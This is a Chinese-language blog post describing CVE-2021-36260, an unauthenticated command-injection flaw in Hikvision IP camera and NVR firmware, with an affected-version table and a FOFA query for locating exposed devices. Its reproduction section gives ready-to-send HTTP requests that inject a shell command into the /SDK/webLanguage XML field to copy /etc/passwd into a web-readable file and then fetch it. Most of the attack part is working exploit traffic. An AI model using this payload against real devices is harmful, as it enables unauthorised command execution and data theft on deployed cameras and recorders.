海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

一、漏洞简介
海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞(CVE-2021-36260)。漏洞影响IP摄像头和NVR设备固件,漏洞是因为对输入参数检验不充分,未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。
二、影响版本
在这里插入图片描述
网络摄像头

|产品类型:影响版本
IPC_E0:IPC_E0_CN_STD_5.4.6_180112
IPC_E1:未知
IPC_E2:IPC_E2_EN_STD_5.5.52_180620
IPC_E4:未知
IPC_E6:IPCK_E6_EN_STD_5.5.100_200226
IPC_E7:IPCK_E7_EN_STD_5.5.120_200604
IPC_G3:IPC_G3_EN_STD_5.5.160_210416
IPC_G5:IPC_G5_EN_STD_5.5.113_210317
IPC_H1:IPC_H1_EN_STD_5.4.61_181204
IPC_H5:IPCP_H5_EN_STD_5.5.85_201120
IPC_H8:Factory installed firmware mid 2021
IPC_R2:IPC_R2_EN_STD_V5.4.81_180203

三、资产测绘

fofa:
app="HIKVISION-视频监控"

四、漏洞复现

1、执行命令写入要执行的命令到文件中。
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: XXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 91

<?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/passwd)</language>


2、读取命令执行结果
GET /passwd HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: XXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 91

<?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/passwd)</language>

正在学习网络安全的小伙伴,有需要资料的可以关注安全技术达人公众号,后期回不断分享安全知识,回复“学习资料”可领取网络安全书籍。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值